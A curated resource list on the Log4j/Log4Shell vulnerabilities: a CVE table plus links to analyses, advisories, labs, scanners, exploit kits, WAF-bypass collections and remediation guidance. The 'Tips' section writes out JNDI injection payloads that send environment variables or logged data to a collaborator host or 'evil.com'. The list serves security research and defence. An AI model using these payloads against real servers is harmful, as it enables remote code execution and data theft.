Table of Contents

• TL;DR
• Technical analysis
• Advisories
• Tutorials
• Videos
• Intentionally vulnerable apps
• Tools & Exploits
  • DNS loggers
• Methodology
• Tips
• WAF bypass
• Awesome lists
• Remediation
• Some vulnerable apps/vendors
• Memes
• TODO

TL;DR

Term	Description
Log4j	The vulnerable Java Library
JndiLookup	The vulnerable part of Log4j
Log4Shell	The exploit developped to attack this vulnerability

Source: CVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowd (modified to add the second CVE)

CVE	Vulnerability type	Affected Log4j versions	Exploitable in default config
CVE-2021-44228	RCE	2.0 through 2.14.1	Yes
CVE-2021-45046	Denial of Service (DoS) and RCE	2.0 through 2.15.0	No
CVE-2021-4104	RCE	1.2*	No
CVE-2021-45105	Denial of Service (DoS)	2.0-beta9 to 2.16.0	No
CVE-2021-44832	RCE	2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4)	No

• CVE-2021-4104 will not be patched, as the Log4j 1.x branch has reached end-of-life

Source: Tenable blog

Source: cutekernel.github.io

Source: govcert.ch

Source: musana.net

Source: Security Zines

Articles & Technical analysis

• Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package
• Log4j Analysis: More JNDI Injection
• Rapid7 analysis: Includes PoCs for Apache Struts2, VMWare VCenter, Apache James, Apache Solr, Apache Druid, Apache JSPWiki and Apache OFBiz
• Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration
• CVE-2021-45105: Denial Of Service Via Uncontrolled Recursion In Log4j Strsubstitutor
• Log4j Vulnerability CVE-2021-45105: What You Need to Know
• Inside the code: How the Log4Shell exploit works & Log4Shell Hell: anatomy of an exploit outbreak
• Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046)
• The Subsequent Waves of log4j Vulnerabilities Aren’t as Bad as People Think
• Examining Log4j Vulnerabilities in Connected Cars and Charging Stations
• Another Log4j on the fire: Unifi
• How to exploit Log4j vulnerabilities in VMWare vCenter
• How I built the PoC for the Log4j zero-day security vulnerability
• Google: Understanding the Impact of Apache Log4j Vulnerability

Advisories

• Apache Log4j Security Vulnerabilities
• CVE-2021-44228 on NIST
• CVE-2021-44832 – Apache Log4j 2.17.0 Arbitrary Code Execution Via JDBCAppender Datasource Element
• Log4J 2.15 TOCTOU Vulnerability Illustrated by GoSecure Researchers

Tutorials

• A Detailed Guide on Log4J Penetration Testing
• log4shell - Quick Guide
• Log4Shell — Simple Technical Explanation of the Exploit

Videos

• Hackers vs. Developers // CVE-2021-44228 Log4Shell
• Log4j RCE vulnerability explained with bypass for the initial fix (CVE-2021-44228, CVE-2021-45046)
• What do you need to know about the log4j (Log4Shell) vulnerability? (Great breakdown of the vulnerability in the first 15 min)
• Short demo by @MalwareTechBlog
• CVE-2021-44228 - Log4j - MINECRAFT VULNERABLE! (and SO MUCH MORE)
• Log4Shell, The Worst Java Vulnerability in Years

Intentionally vulnerable apps

• Solar, exploiting log4j (TryHackMe room by @_JohnHammond) & Video walkthrough by CryptoCat
• PentesterLab Log4j RCE & Log4j RCE II
• BugHuntr.io scenario
• christophetd/log4shell-vulnerable-app
• leonjza/log4jpwn
• kozmer/log4j-shell-poc
• Cyb3rWard0g/log4jshell-lab

Tools & Exploits

• google/log4jscanner
• Log4Shell Everywhere
• Ch0pin/log4JFrida
• dwisiswant0/look4jar
• yahoo/check-log4j
• jfrog/log4j-tools
• tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
• JNDI-Exploit-Kit
• Thinkst Canary
• Huntress Log4Shell Tester
• log4shell.nse (Nmap NSE script that injects a Huntress/CanaryTokens/custom log4shell payload in HTTP requests described by JSON templates)
• @SilentSignalHU’s Log4Shell Scanner (Burp extension)
• ActiveScan++
• fullhunt/log4j-scan & How to combine it with Amass for higher coverage
• Burp Bounty Pro Profile
• whwlsfb/Log4j2Scan (Passive Scanner plugin for Burp)
• Semgrep rule
• CodeQL query
• Nuclei template
• Burp Intruder in Pitchfork mode
• LogMePwn
• LeakIX/l9fuzz
• redhuntlabs/Log4JHunt
• OWASP ZAP
• adilsoybali/Log4j-RCE-Scanner
• JNDI injector for burp pro
• alexandre-lavoie/python-log4rce
• Log4jUnifi
• Log4jCenter
• Exploiting CVE-2021-44228 using PDFs as delivery channel - PoC

DNS loggers

• dns-exfil
• canarytokens (use Token Type: Log4Shell)
• interactsh
• Burp Collaborator
• requestbin

Methodology

Source: v2-detectLog4shell mindmap by @Dick_Reverse

Source: AmIVulnerable-Log4shell-v6.1 mindmap by @Dick_Reverse

Tips

• The Log4J formatting is nestable which means payloads like ${jndi:ldap://${env:user}.xyz.collab.com/a} will leak server side env vars
• Tutorial on setting up RogueJDNI
• Class path is useful information to have to know what gadgets should be available or where you need to look for some to get rce.
• How to attack any JDK version for log4j "without" guessing classpath on server?
• Some events are only logged when an exception occur, so specially long payloads with unexpected characters may help you trigger those exceptions.
• If you omit the closing brace } (so the payload would look like ${jndi:ldap://evil.com/), you will potentially get a bunch of data exfiltrated to your server until the next } appears in that data
• Attack path works in ANY java version
• If you’re scanning for Log4Shell at scale, you can easily determine which host is pinging back by adding it to the start of your callback hostname
• Examples of non-default vulnerable patterns
• Polymorphic Log4J exploit that is a valid JSON REST API request

WAF bypass

• Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
• woodpecker-appstore/log4j-payload-generator
• Log4j Lookups

Bypass examples

• AWS/Cloudfront WAF bypass
• https://twitter.com/wugeej/status/1469982901412728832
• https://twitter.com/BountyOverflow/status/1470001858873802754
• https://twitter.com/h4x0r_dz/status/1469663187079417857
• https://twitter.com/ymzkei5/status/1469765165348704256
• https://twitter.com/wireghoul/status/1469473975449255941
• https://twitter.com/Rezn0k/status/1469523006015750146
• https://twitter.com/Laughing_Mantis/status/1470526083271303172
• https://twitter.com/11xuxx/status/1473777341201625088

Awesome lists

• Reddit mega thread curated by NCC Group
• Awesome Log4Shell
• NCSC-NL/log4shell

Remediation

• CISA Alert (AA21-356A): Mitigating Log4Shell and Other Log4j-Related Vulnerabilities
• Guide: How To Detect and Mitigate the Log4Shell Vulnerability (CVE-2021-44228)

Source: Shield-Log4shell-v1 mindmap by @Dick_Reverse

Some vulnerable apps/vendors

• YfryTchsGD/Log4jAttackSurface
• 20211210-TLP-WHITE_LOG4J.md
• NCSC-NL/log4shell
• ZAP
• Ingenuity, the Mars 2020 Helicopter mssion
• VCenter
• Ghidra
• Apache JAMES SMTP server

Memes

• lo4jmemes.com
• istheinternetonfire.com

TODO

Add headers, payloads, data that can be exfiltrated, entry point examples & tools to receive OOB DNS requests.